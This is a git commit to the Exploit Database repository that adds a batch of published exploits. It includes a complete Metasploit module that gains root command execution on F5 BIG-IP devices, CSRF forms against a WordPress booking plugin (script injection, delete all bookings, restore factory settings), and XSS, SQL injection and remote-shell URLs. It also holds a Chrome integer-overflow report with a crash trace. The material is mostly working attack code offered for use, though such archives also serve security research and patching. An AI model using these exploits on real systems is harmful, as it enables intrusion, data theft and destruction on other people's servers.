DB: 2015-11-20

14 new exploits
This commit is contained in:
Offensive Security 2015-11-20 05:02:37 +00:00
parent 043724668f
commit c9f356cc3c
15 changed files with 970 additions and 0 deletions

View file

@ -35021,3 +35021,17 @@ id,file,description,date,author,platform,type,port
38749,platforms/asp/webapps/38749.txt,"Flo CMS 'archivem' Parameter SQL Injection Vulnerability",2013-09-03,ACC3SS,asp,webapps,0
38750,platforms/php/webapps/38750.txt,"WordPress Users Ultra Plugin 1.5.50 - Unrestricted File Upload",2015-11-18,"Panagiotis Vagenas",php,webapps,0
38751,platforms/windows/local/38751.txt,"IBM i Access 7.1 - Buffer Overflow Code Execution",2015-11-18,hyp3rlinx,windows,local,0
38752,platforms/windows/local/38752.c,"Watchguard Server Center Local Privilege Escalation Vulnerability",2013-09-08,"Julien Ahrens",windows,local,0
38753,platforms/php/webapps/38753.html,"WordPress Event Easy Calendar Plugin Multiple Cross Site Request Forgery Vulnerabilities",2013-09-07,anonymous,php,webapps,0
38754,platforms/php/webapps/38754.txt,"eTransfer Lite 'file name' Parameter HTML Injection Vulnerability",2013-09-10,"Benjamin Kunz Mejri",php,webapps,0
38755,platforms/php/webapps/38755.txt,"WordPress mukioplayer4wp Plugin 'cid' Parameter SQL Injection Vulnerability",2013-09-13,"Ashiyane Digital Security Team",php,webapps,0
38756,platforms/php/webapps/38756.txt,"WordPress RokNewsPager Plugin 'thumb.php' Multiple Security Vulnerabilities",2013-09-18,MustLive,php,webapps,0
38757,platforms/php/webapps/38757.txt,"WordPress RokStories Plugin 'thumb.php' Multiple Security Vulnerabilities",2013-09-17,MustLive,php,webapps,0
38758,platforms/windows/dos/38758.py,"SuperScan 4.1 - Scan Hostname/IP Field Buffer Overflow",2015-11-19,"Luis Martínez",windows,dos,0
38759,platforms/windows/dos/38759.py,"SuperScan 4.1 - Tools Hostname/IP/URL Field Buffer Overflow",2015-11-19,"Luis Martínez",windows,dos,0
38760,platforms/windows/dos/38760.py,"SuperScan 4.1 - Windows Enumeration Hostname/IP/URL Field SEH Overflow",2015-11-19,"Luis Martínez",windows,dos,0
38761,platforms/windows/dos/38761.py,"Sam Spade 1.14 - Decode URL Buffer Overflow Crash PoC",2015-11-19,"Vivek Mahajan",windows,dos,0
38762,platforms/windows/webapps/38762.txt,"Netwin SurgeFTP Sever 23d6 - Stored Cross Site Scripting Vulnerabilities.",2015-11-19,Un_N0n,windows,webapps,0
38763,platforms/lin_x86/dos/38763.txt,"Chrome - open-vcdiff OOB Read in Browser Process Integer Overflow",2015-11-19,"Google Security Research",lin_x86,dos,0
38764,platforms/hardware/remote/38764.rb,"F5 iControl iCall::Script Root Command Execution",2015-11-19,metasploit,hardware,remote,443
38765,platforms/php/webapps/38765.txt,"Horde Groupware 5.2.10 - CSRF Vulnerability",2015-11-19,"High-Tech Bridge SA",php,webapps,80

Can't render this file because it is too large.

View file

@ -0,0 +1,283 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'nokogiri'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
SOAPENV_ENCODINGSTYLE = { "soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/" }
STRING_ATTRS = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
LONG_ATTRS = { 'xsi:type' => 'urn:Common.ULongSequence', 'soapenc:arrayType' => 'xsd:long[]', 'xmlns:urn' => 'urn:iControl' }
def initialize(info = {})
super(
update_info(
info,
'Name' => "F5 iControl iCall::Script Root Command Execution",
'Description' => %q{
This module exploits an authenticated privilege escalation
vulnerability in the iControl API on the F5 BIG-IP LTM (and likely
other F5 devices). This requires valid credentials and the Resource
Administrator role. The exploit should work on BIG-IP 11.3.0
- 11.6.0, (11.5.x < 11.5.3 HF2 or 11.6.x < 11.6.0 HF6, see references
for more details)
},
'License' => MSF_LICENSE,
'Author' =>
[
'tom', # Discovery, Metasploit module
'Jon Hart <jon_hart[at]rapid7.com>' # Metasploit module
],
'References' =>
[
['CVE', '2015-3628'],
['URL', 'https://support.f5.com/kb/en-us/solutions/public/16000/700/sol16728.html'],
['URL', 'https://gdssecurity.squarespace.com/labs/2015/9/8/f5-icallscript-privilege-escalation-cve-2015-3628.html']
],
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Targets' =>
[
['F5 BIG-IP LTM 11.x', {}]
],
'Privileged' => true,
'DisclosureDate' => "Sep 3 2015",
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(443),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new('TARGETURI', [true, 'The base path to the iControl installation', '/iControl/iControlPortal.cgi']),
OptString.new('USERNAME', [true, 'The username to authenticate with', 'admin']),
OptString.new('PASSWORD', [true, 'The password to authenticate with', 'admin'])
])
register_advanced_options(
[
OptInt.new('SESSION_WAIT', [ true, 'The max time to wait for a session, in seconds', 5 ]),
OptString.new('PATH', [true, 'Filesystem path for the dropped payload', '/tmp']),
OptString.new('FILENAME', [false, 'File name of the dropped payload, defaults to random']),
OptInt.new('ARG_MAX', [true, 'Command line length limit', 131072])
])
end
def setup
file = datastore['FILENAME']
file ||= ".#{Rex::Text.rand_text_alphanumeric(16)}"
@payload_path = ::File.join(datastore['PATH'], file)
super
end
def build_xml
builder = Nokogiri::XML::Builder.new do |xml|
xml.Envelope do
xml = xml_add_namespaces(xml)
xml['soapenv'].Header
xml['soapenv'].Body do
yield xml
end
end
end
builder.to_xml
end
def xml_add_namespaces(xml)
ns = xml.doc.root.add_namespace_definition("soapenv", "http://schemas.xmlsoap.org/soap/envelope/")
xml.doc.root.namespace = ns
xml.doc.root.add_namespace_definition("xsi", "http://www.w3.org/2001/XMLSchema-instance")
xml.doc.root.add_namespace_definition("xsd", "http://www.w3.org/2001/XMLSchema")
xml.doc.root.add_namespace_definition("scr", "urn:iControl:iCall/Script")
xml.doc.root.add_namespace_definition("soapenc", "http://schemas.xmlsoap.org/soap/encoding")
xml.doc.root.add_namespace_definition("per", "urn:iControl:iCall/PeriodicHandler")
xml
end
def send_soap_request(pay)
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path),
'method' => 'POST',
'data' => pay,
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
)
if res
return res
else
vprint_error('No response')
end
false
end
def create_script(name, cmd)
create_xml = build_xml do |xml|
xml['scr'].create(SOAPENV_ENCODINGSTYLE) do
xml.scripts(STRING_ATTRS) do
xml.parent.namespace = xml.parent.parent.namespace_definitions.first
xml.item name
end
xml.definitions(STRING_ATTRS) do
xml.parent.namespace = xml.parent.parent.namespace_definitions.first
xml.item cmd
end
end
end
send_soap_request(create_xml)
end
def delete_script(script_name)
delete_xml = build_xml do |xml|
xml['scr'].delete_script(SOAPENV_ENCODINGSTYLE) do
xml.scripts(STRING_ATTRS) do
xml.parent.namespace = xml.parent.parent.namespace_definitions.first
xml.item script_name
end
end
end
print_error("Error while cleaning up script #{script_name}") unless (res = send_soap_request(delete_xml))
res
end
def script_exists?(script_name)
exists_xml = build_xml do |xml|
xml['scr'].get_list(SOAPENV_ENCODINGSTYLE)
end
res = send_soap_request(exists_xml)
res && res.code == 200 && res.body =~ Regexp.new("/Common/#{script_name}")
end
def create_handler(handler_name, script_name)
print_status("Creating trigger #{handler_name}")
handler_xml = build_xml do |xml|
xml['per'].create(SOAPENV_ENCODINGSTYLE) do
xml.handlers(STRING_ATTRS) do
xml.parent.namespace = xml.parent.parent.namespace_definitions.first
xml.item handler_name
end
xml.scripts(STRING_ATTRS) do
xml.parent.namespace = xml.parent.parent.namespace_definitions.first
xml.item script_name
end
xml.intervals(LONG_ATTRS) do
xml.parent.namespace = xml.parent.parent.namespace_definitions.first
# we set this to run once every 24h, but because there is no
# start/end time it will run once, more or less immediately, and
# again 24h from now, but by that point hopefully we will have
# cleaned up and the handler/script/etc are gone
xml.item 60 * 60 * 24
end
end
end
res = send_soap_request(handler_xml)
if res
if res.code == 200 && res.body =~ Regexp.new("iCall/PeriodicHandler")
true
else
print_error("Trigger creation failed -- HTTP/#{res.proto} #{res.code} #{res.message}")
false
end
else
print_error("No response to trigger creation")
false
end
end
def delete_handler(handler_name)
delete_xml = build_xml do |xml|
xml['per'].delete_handler(SOAPENV_ENCODINGSTYLE) do
xml.handlers(STRING_ATTRS) do
xml.parent.namespace = xml.parent.parent.namespace_definitions.first
xml.item handler_name
end
end
end
print_error("Error while cleaning up handler #{handler_name}") unless (res = send_soap_request(delete_xml))
res
end
def handler_exists?(handler_name)
handler_xml = build_xml do |xml|
xml['per'].get_list(SOAPENV_ENCODINGSTYLE)
end
res = send_soap_request(handler_xml)
res && res.code == 200 && res.body =~ Regexp.new("/Common/#{handler_name}")
end
def check
# strategy: we'll send a create_script request, with empty name:
# if everything is ok, the server return a 500 error saying it doesn't like empty names
# XXX ignored at the moment: if the user doesn't have enough privileges, 500 error also is returned, but saying 'access denied'.
# if the user/password is wrong, a 401 error is returned, the server might or might not be vulnerable
# any other response is considered not vulnerable
res = create_script('', '')
if res && res.code == 500 && res.body =~ /path is empty/
return Exploit::CheckCode::Appears
elsif res && res.code == 401
print_warning("HTTP/#{res.proto} #{res.code} #{res.message} -- incorrect USERNAME or PASSWORD?")
return Exploit::CheckCode::Unknown
else
return Exploit::CheckCode::Safe
end
end
def exploit
# phase 1: create iCall script to create file with payload, execute it and remove it.
shell_cmd = %(echo #{Rex::Text.encode_base64(payload.encoded)}|base64 --decode >#{@payload_path}; chmod +x #{@payload_path};#{@payload_path})
cmd = %(exec /bin/sh -c "#{shell_cmd}")
arg_max = datastore['ARG_MAX']
if shell_cmd.size > arg_max
print_error "Payload #{datastore['PAYLOAD']} is too big, try a different payload "\
"or increasing ARG_MAX (note that payloads bigger than the target's configured ARG_MAX value may fail to execute)"
return false
end
script_name = "script-#{Rex::Text.rand_text_alphanumeric(16)}"
print_status("Uploading payload script #{script_name}")
unless (create_script_res = create_script(script_name, cmd))
print_error("No response when uploading payload script")
return false
end
unless create_script_res.code == 200
print_error("Upload payload script failed -- HTTP/#{create_script_res.proto} "\
"#{create_script_res.code} #{create_script_res.message}")
return false
end
unless script_exists?(script_name)
print_error("Payload script uploaded successfully but script was not found")
return false
end
register_file_for_cleanup @payload_path
# phase 2: create iCall Handler, that will actually run the previously created script
handler_name = "handler-#{Rex::Text.rand_text_alphanumeric(16)}"
unless create_handler(handler_name, script_name)
delete_script(script_name)
return false
end
unless handler_exists?(handler_name)
print_error("Trigger created successfully but was not found")
delete_script(script_name)
return false
end
print_status('Waiting for payload to execute...')
# if our payload has not been successfully executed just yet, wait
# until it does or give up
slept = 0
until session_created? || slept > datastore['SESSION_WAIT']
Rex.sleep(1)
slept += 1
end
print_status('Trying cleanup...')
delete_script(script_name)
delete_handler(handler_name)
end
end

131
platforms/lin_x86/dos/38763.txt Executable file
View file

@ -0,0 +1,131 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=513
There's an integer overflow issue in sanity checking section lengths when parsing the vcdiff format (used in SDCH content encoding). This results in the parser parsing outside of sane memory bounds when parsing the contents of a vcdiff window - see attached crash PoC.
(/src/sdch/open-vcdiff/src/headerparser.cc)
bool VCDiffHeaderParser::ParseSectionLengths(
bool has_checksum,
size_t* add_and_run_data_length,
size_t* instructions_and_sizes_length,
size_t* addresses_length,
VCDChecksum* checksum) {
ParseSize("length of data for ADDs and RUNs", add_and_run_data_length); // <---- user controlled
ParseSize("length of instructions section", instructions_and_sizes_length); // <---- user controlled
ParseSize("length of addresses for COPYs", addresses_length); // <---- user controlled
if (has_checksum) {
ParseChecksum("Adler32 checksum value", checksum);
}
if (RESULT_SUCCESS != return_code_) {
return false;
}
if (!delta_encoding_start_) {
VCD_DFATAL << "Internal error: VCDiffHeaderParser::ParseSectionLengths "
"was called before ParseWindowLengths" << VCD_ENDL;
return_code_ = RESULT_ERROR;
return false;
}
const size_t delta_encoding_header_length =
UnparsedData() - delta_encoding_start_;
if (delta_encoding_length_ !=
(delta_encoding_header_length +
*add_and_run_data_length +
*instructions_and_sizes_length +
*addresses_length)) { // <---- Integer overflow here (32-bit systems only)
VCD_ERROR << "The length of the delta encoding does not match "
"the size of the header plus the sizes of the data sections"
<< VCD_ENDL;
return_code_ = RESULT_ERROR;
return false;
}
return true;
}
These returned lengths are subsequently used to initialise length-checked buffer objects for continuing the parsing (vcdecoder.cc:1024)
size_t add_and_run_data_length = 0;
size_t instructions_and_sizes_length = 0;
size_t addresses_length = 0;
if (!header_parser->ParseSectionLengths(has_checksum_,
&add_and_run_data_length,
&instructions_and_sizes_length,
&addresses_length,
&expected_checksum_)) {
return header_parser->GetResult();
}
if (parent_->AllowInterleaved() &&
// snip...
} else {
// If interleaved format is not used, then the whole window contents
// must be available before decoding can begin. If only part of
// the current window is available, then report end of data
// and re-parse the whole header when DecodeChunk() is called again.
if (header_parser->UnparsedSize() < (add_and_run_data_length +
instructions_and_sizes_length +
addresses_length)) {
return RESULT_END_OF_DATA;
}
data_for_add_and_run_.Init(header_parser->UnparsedData(),
add_and_run_data_length);
instructions_and_sizes_.Init(data_for_add_and_run_.End(),
instructions_and_sizes_length);
addresses_for_copy_.Init(instructions_and_sizes_.End(), addresses_length);
This issue only affects 32-bit builds, since ParseSize is parsing a positive int32_t; on 64-bit builds it cannot be large enough to wrap a size_t.
It's unclear if this is exploitable as a browser-process infoleak; the results of SDCH decoding will be returned to a renderer process, but the way that the returned values are used mean that it is likely that the process will have to survive reads at opposite ends of the address space, which *should* be guaranteed to crash with a 2:2 address space split. It is possible that on 32-bit Windows with a 1:3 address space split this can be survived, or with careful crafting of the input file these reads can be avoided; I've not investigated further at this point.
It appears to be necessary to host the PoC on a legitimate domain; as localhost is not supported for SDCH.
VERSION
Chrome Version: 47.0.2499.0
Operating System: Linux x86
REPRODUCTION CASE
Please include a demonstration of the security bug, such as an attached
HTML or binary file that reproduces the bug when loaded in Chrome. PLEASE
make the file as small as possible and remove any content not required to
demonstrate the bug.
FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: browser
Crash State:
eax 0xf9ae8a78 -106001800
ecx 0xe7502d43 -414175933
edx 0x7b83e020 2072240160
ebx 0xf76597a0 -144336992
esp 0xe75025d0 0xe75025d0
ebp 0xe7502798 0xe7502798
esi 0x5 5
edi 0xf9061200 -117042688
eip 0xf1ddebee 0xf1ddebee <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+94>
eflags 0x210a93 [ CF AF SF IF OF RF ID ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x63 99
=> 0xf1ddebee <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+94>: movzbl (%edx),%ecx
0xf1ddebf1 <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+97>: mov (%edi),%esi
0xf1ddebf3 <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+99>: cmpb $0x0,0x100(%esi,%ecx,1)
0xf1ddebfb <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+107>: je 0xf1ddec06 <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+118>
0xf1ddebfd <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+109>: movsbl %cl,%edx
#0 open_vcdiff::VCDiffCodeTableReader::GetNextInstruction (this=0xf9061200, size=0x5, mode=0xf9ae8a78 " \340\203{Ox\a\376\001") at ../../sdch/open-vcdiff/src/decodetable.cc:78
#1 0xf1ddcab5 in open_vcdiff::VCDiffDeltaFileWindow::DecodeBody (this=0xf90611c4, parseable_chunk=<optimized out>) at ../../sdch/open-vcdiff/src/vcdecoder.cc:1231
#2 0xf1ddbc8b in open_vcdiff::VCDiffDeltaFileWindow::DecodeWindow (this=0xf90611c4, parseable_chunk=0xe75031a8) at ../../sdch/open-vcdiff/src/vcdecoder.cc:1359
#3 0xf1ddb6f0 in open_vcdiff::VCDiffStreamingDecoderImpl::DecodeChunk (this=0xf90611b0, data=<optimized out>, len=<optimized out>, output_string=0x8) at ../../sdch/open-vcdiff/src/vcdecoder.cc:887
#4 0xf1ddd499 in open_vcdiff::VCDiffStreamingDecoder::DecodeChunkToInterface (this=0x8b, data=0xe7503300 "8\026B\367\030'\317", <incomplete sequence \371\226>, len=3880792832, output_string=0xf76597a0 <_GLOBAL_OFFSET_TABLE_>) at ../../sdch/open-vcdiff/src/vcdecoder.cc:1393
#5 0xf1d2b17f in DecodeChunk<std::basic_string<char> > (this=0x7b83e020, data=<optimized out>, len=3880791363, output=<optimized out>) at ../../sdch/open-vcdiff/src/google/vcdecoder.h:83
#6 net::SdchFilter::ReadFilteredData (this=0xf9cf26e0, dest_buffer=0xd2ce0000 "", dest_len=<optimized out>) at ../../net/filter/sdch_filter.cc:424
#7 0xf1d28990 in net::Filter::ReadData (this=0xf9cf26e0, dest_buffer=0x7b83e020 <error: Cannot access memory at address 0x7b83e020>, dest_len=0xe75033c8) at ../../net/filter/filter.cc:131
#8 0xf1d2895c in net::Filter::ReadData (this=0xfd6b7c00, dest_buffer=<optimized out>, dest_len=0xe75033c8) at ../../net/filter/filter.cc:145
#9 0xf1ca8dde in net::URLRequestJob::ReadFilteredData (this=0xf9891a00, bytes_read=<optimized out>) at ../../net/url_request/url_request_job.cc:673
#10 0xf1ca8c1d in net::URLRequestJob::Read (this=0xf9891a00, buf=<optimized out>, buf_size=<optimized out>, bytes_read=0xe75034fc) at ../../net/url_request/url_request_job.cc:126
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38763.zip

202
platforms/php/webapps/38753.html Executable file
View file

@ -0,0 +1,202 @@
source: http://www.securityfocus.com/bid/62269/info
The Event Easy Calendar plugin for WordPress is prone to multiple cross-site request-forgery vulnerabilities.
Exploiting these issues may allow a remote attacker to perform certain unauthorized actions in the context of the affected application. Other attacks are also possible.
Event Easy Calendar 1.0.0 is vulnerable; other versions may also be affected.
f of Concept
========================
Add Customer
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
<input type="hidden" name="data-table_length" value="10">
<input type="hidden" name="radioservice" value="1">
<input type="hidden" name="hdServiceTypeDDL" value="">
<input type="hidden" name="uxTxtControl1" value="new () user com">
<input type="hidden" name="uxTxtControl2" value="<script>alert(1)</script>">
<input type="hidden" name="hiddeninputname" value="">
<input type="hidden" name="hiddeninputname" value="">
<input type="hidden" name="uxHdnTotalCost" value="0.00">
<input type="hidden" name="param" value="addNewCustomer">
<input type="hidden" name="action" value="bookingsLibrary">
<input type="submit" value="Add Customer">
</form>
Update Customer
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
<input type="hidden" name="data-table_length" value="10">
<input type="hidden" name="radioservice" value="2">
<input type="hidden" name="hdServiceTypeDDL" value="">
<input type="hidden" name="uxTxtControl1" value="new () user com">
<input type="hidden" name="uxTxtControl2" value="NewUser">
<input type="hidden" name="hiddeninputname" value="">
<input type="hidden" name="hiddeninputname" value="">
<input type="hidden" name="uxHdnTotalCost" value="100.00">
<input type="hidden" name="customerId" value="3">
<input type="hidden" name="uxCustomerEmail" value="new () user com">
<input type="hidden" name="param" value="upDateCustomer">
<input type="hidden" name="action" value="bookingsLibrary">
<input type="submit" value="Update Customer">
</form>
New Booking
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
<input type="hidden" name="altField" value="2013-08-15">
<input type="hidden" name="serviceId" value="2">
<input type="hidden" name="customerId" value="5">
<input type="hidden" name="uxCouponCode" value="">
<input type="hidden" name="uxNotes" value="">
<input type="hidden" name="bookingTime" value="900">
<input type="hidden" name="param" value="frontEndMutipleDates">
<input type="hidden" name="action" value="bookingsLibrary">
<input type="submit" value="New Booking">
</form>
Add Service
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
<input type="hidden" name="uxServiceColor" value="#00ff00">
<input type="text" name="uxServiceName" value="CSRF service<script>alert(1)</script>">
<input type="hidden" name="uxServiceCost" value="0">
<input type="hidden" name="uxServiceType" value="0">
<input type="hidden" name="uxMaxBookings" value="1">
<input type="hidden" name="uxFullDayService" value="">
<input type="hidden" name="uxMaxDays" value="1">
<input type="hidden" name="uxCostType" value="0">
<input type="hidden" name="uxServiceHours" value="00">
<input type="hidden" name="uxServiceMins" value="30">
<input type="hidden" name="uxStartTimeHours" value="9">
<input type="hidden" name="uxStartTimeMins" value="0">
<input type="hidden" name="uxStartTimeAMPM" value="AM">
<input type="hidden" name="uxEndTimeHours" value="5">
<input type="hidden" name="uxEndTimeMins" value="0">
<input type="hidden" name="uxEndTimeAMPM" value="PM">
<input type="hidden" name="param" value="addService">
<input type="hidden" name="action" value="dashboardLibrary">
<input type="submit" value="Add Service">
</form>
Add Block Out
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
<input type="hidden" name="uxExceptionsServices" value="4">
<input type="hidden" name="uxExceptionsIntervals" value="1">
<input type="hidden" name="uxExceptionsRepeatDay" value="1">
<input type="hidden" name="uxExceptionsStartsOn" value="">
<input type="hidden" name="uxExceptionsStartTimeHours" value="09">
<input type="hidden" name="uxExceptionsStartTimeMins" value="00">
<input type="hidden" name="uxExceptionsStartTimeAMPM" value="AM">
<input type="hidden" name="uxExceptionsEndTimeHours" value="05">
<input type="hidden" name="uxExceptionsEndTimeMins" value="00">
<input type="hidden" name="uxExceptionsEndTimeAMPM" value="PM">
<input type="hidden" name="uxExceptionsDay" value="0">
<input type="hidden" name="uxExceptionsDayEndsOn" value="">
<input type="hidden" name="uxExceptionsWeekDay1" value="Sun">
<input type="hidden" name="uxExceptionsWeekDay2" value="Wed">
<input type="hidden" name="uxExceptionsRepeatWeeks" value="9">
<input type="hidden" name="uxExceptionsWeekStartsOn" value="2013-08-22">
<input type="hidden" name="uxExceptionsWeekStartTimeHours" value="09">
<input type="hidden" name="uxExceptionsWeekStartTimeMins" value="00">
<input type="hidden" name="uxExceptionsWeekStartTimeAMPM" value="AM">
<input type="hidden" name="uxExceptionsWeekEndTimeHours" value="05">
<input type="hidden" name="uxExceptionsWeekEndTimeMins" value="00">
<input type="hidden" name="uxExceptionsWeekEndTimeAMPM" value="PM">
<input type="hidden" name="uxExceptionsWeek" value="0">
<input type="hidden" name="uxExceptionsWeekEndsOn" value="">
<input type="hidden" name="param" value="insertExceptionWeeks">
<input type="hidden" name="action" value="dashboardLibrary">
<input type="submit" value="Add Block Out">
</form>
Add Cupon
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
<input type="hidden" name="uxDefaultCoupon" value="XSS<script>alert('xss')</script>">
<input type="hidden" name="uxValidFrom" value="2013-08-15">
<input type="hidden" name="uxValidUpto" value="2013-08-22">
<input type="hidden" name="uxAmount" value="50">
<input type="hidden" name="uxDdlAmountType" value="1">
<input type="hidden" name="uxApplicableOnAllProducts" value="1">
<input type="hidden" name="uxDdlBookingServices" value="4">
<input type="hidden" name="param" value="addCoupons">
<input type="hidden" name="action" value="dashboardLibrary">
<input type="submit" value="Add Cupon">
</form>
Default Settings
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
<input type="hidden" name="uxDdlDefaultCurrency" value="United States Dollar">
<input type="hidden" name="uxDdlDefaultCountry" value="United States of America">
<input type="hidden" name="uxDefaultDateFormat" value="0">
<input type="hidden" name="uxDefaultTimeFormat" value="0">
<input type="hidden" name="uxDefaultTimeZone" value="-5.0">
<input type="hidden" name="uxServiceDisplayFormat" value="0">
<input type="hidden" name="param" value="updateGeneralSettings">
<input type="hidden" name="action" value="dashboardLibrary">
<input type="submit" value="Default Settings">
</form>
Reminder Settings
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
<input type="hidden" name="uxReminderSettings" value="1">
<input type="hidden" name="uxReminderInterval" value="1 hour">
<input type="hidden" name="param" value="UpdateReminderSettings">
<input type="hidden" name="action" value="dashboardLibrary">
<input type="submit" value="Reminder Settings">
</form>
PayPal Settings
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
Email: <input type="text" name="uxMerchantEmailAddress" placeholder="enter your PayPal email here">
<input type="hidden" name="uxPayPal" value="1">
<input type="hidden" name="uxPayPalUrl" value="https://paypal.com/cgi-bin/webscr";>
<input type="hidden" name="uxThankyouPageUrl" value="http://google.com";>
<input type="hidden" name="uxCancellationUrl" value="http://google.com";>
<input type="hidden" name="param" value="UpdatePaymentGateway">
<input type="hidden" name="action" value="dashboardLibrary">
<input type="submit" value="PayPal Settings">
</form>
Mailchimp Settings
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
<input type="hidden" name="uxMailChimp" value="1">
<input type="hidden" name="uxMailChimpApiKey" value="12345678">
<input type="hidden" name="uxMailChimpUniqueId" value="87654321">
<input type="hidden" name="uxDoubleOptIn" value="false">
<input type="hidden" name="uxWelcomeEmail" value="false">
<input type="hidden" name="param" value="UpdateAutoResponder">
<input type="hidden" name="action" value="dashboardLibrary">
<input type="submit" value="Mailchimp Settings">
</form>
Facebook Connect
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
<input type="hidden" name="uxFacebookConnect" value="1">
<input type="hidden" name="uxFacebookAppId" value="12345678">
<input type="hidden" name="uxFacebookSecretKey" value="87654321">
<input type="hidden" name="param" value="UpdateFacebookSocialMedia">
<input type="hidden" name="action" value="dashboardLibrary">
<input type="submit" value="Facebook Connect">
</form>
Auto Approve
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
<input type="hidden" name="uxAutoApprove" value="1">
<input type="hidden" name="param" value="AutoApprove">
<input type="hidden" name="action" value="dashboardLibrary">
<input type="submit" value="Auto Approve">
</form>
Delete All Bookings
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
<input type="hidden" name="param" value="DeleteAllBookings">
<input type="hidden" name="action" value="dashboardLibrary">
<input type="submit" value="Delete All Bookings">
</form>
Restore Factory Settings
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
<input type="hidden" name="param" value="RestoreFactorySettings">
<input type="hidden" name="action" value="dashboardLibrary">
<input type="submit" value="Restore Factory Settings">
</form>

22
platforms/php/webapps/38754.txt Executable file
View file

@ -0,0 +1,22 @@
source: http://www.securityfocus.com/bid/62313/info
eTransfer Lite is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and control how the site is rendered to the user; other attacks are also possible.
eTransfer Lite 1.0 is vulnerable; other versions may also be affected.
<bq>The following files are hosted live from the iPad's Docs folder.</bq><p><b>Images:<br><br></b>
<a href="http://www.example.com/%3C[PERSISTENT INJECTED SCRIPT CODE!]%3Es2.png"><[PERSISTENT INJECTED SCRIPT
CODE!]">s2.png</a>
( 51.8 Kb, 2013-08-25 02:09:25 +0000)<br />
<a href="a2b642e7de.jpg">a2b642e7de.jpg</a>
( 238.0 Kb, 2013-08-25 02:08:13 +0000)<br />
</p><br><br><br><hr><br><br><br><center><form
action="" method="post" enctype="multipart/form-data" name="form1"
id="form1"><label>Upload file to iPad <input type="file"
name="file" id="file" /></label><label> <input
type="submit" name="button" id="button" value="Submit"
/></label></form></center><br><br><br>Powered
By <a
href=http://www.example.com</a></body></html></iframe></a></p></body></html>

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/62438/info
mukioplayer4wp for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
mukioplayer4wp 1.6 is vulnerable; other versions may also be affected.
http://www.example.com/videos/wp-content/plugins/mukioplayer-for-wordpress/php-scripts/get.php?cid=71866877%27

15
platforms/php/webapps/38756.txt Executable file
View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/62458/info
The RokNewsPager plugin for WordPress is prone to multiple security vulnerabilities, including:
1. An information-disclosure vulnerability
2. A cross-site scripting vulnerability
3. An arbitrary file-upload vulnerability
4. A denial-of-service vulnerability
Attackers can exploit these issues to obtain sensitive information, upload arbitrary files, perform a denial-of-service attack, execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/wp-content/plugins/wp_roknewspager/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg
http://www.example.com/wp-content/plugins/wp_roknewspager/thumb.php?src=http://
http://www.example.com/wp-content/plugins/wp_roknewspager/thumb.php?src=http://www.example.com/big_file&h=1&w=1
http://www.example.com/wp-content/plugins/wp_roknewspager/thumb.php?src=http://www.example2.com/shell.php

20
platforms/php/webapps/38757.txt Executable file
View file

@ -0,0 +1,20 @@
source: http://www.securityfocus.com/bid/62459/info
The RokStories plugin for WordPress is prone to multiple security vulnerabilities, including:
1. An arbitrary file-upload vulnerability
2. A cross-site scripting vulnerability
3. An information-disclosure vulnerability
4. A denial-of-service vulnerability
Attackers can exploit these issues to obtain sensitive information, upload arbitrary files, perform a denial-of-service attack, execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
RokStories 1.25 is vulnerable; other versions may also be affected.
http://www.example.com/wp-content/plugins/wp_rokstories/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg
http://www.example.com/wp-content/plugins/wp_rokstories/thumb.php?src=http://
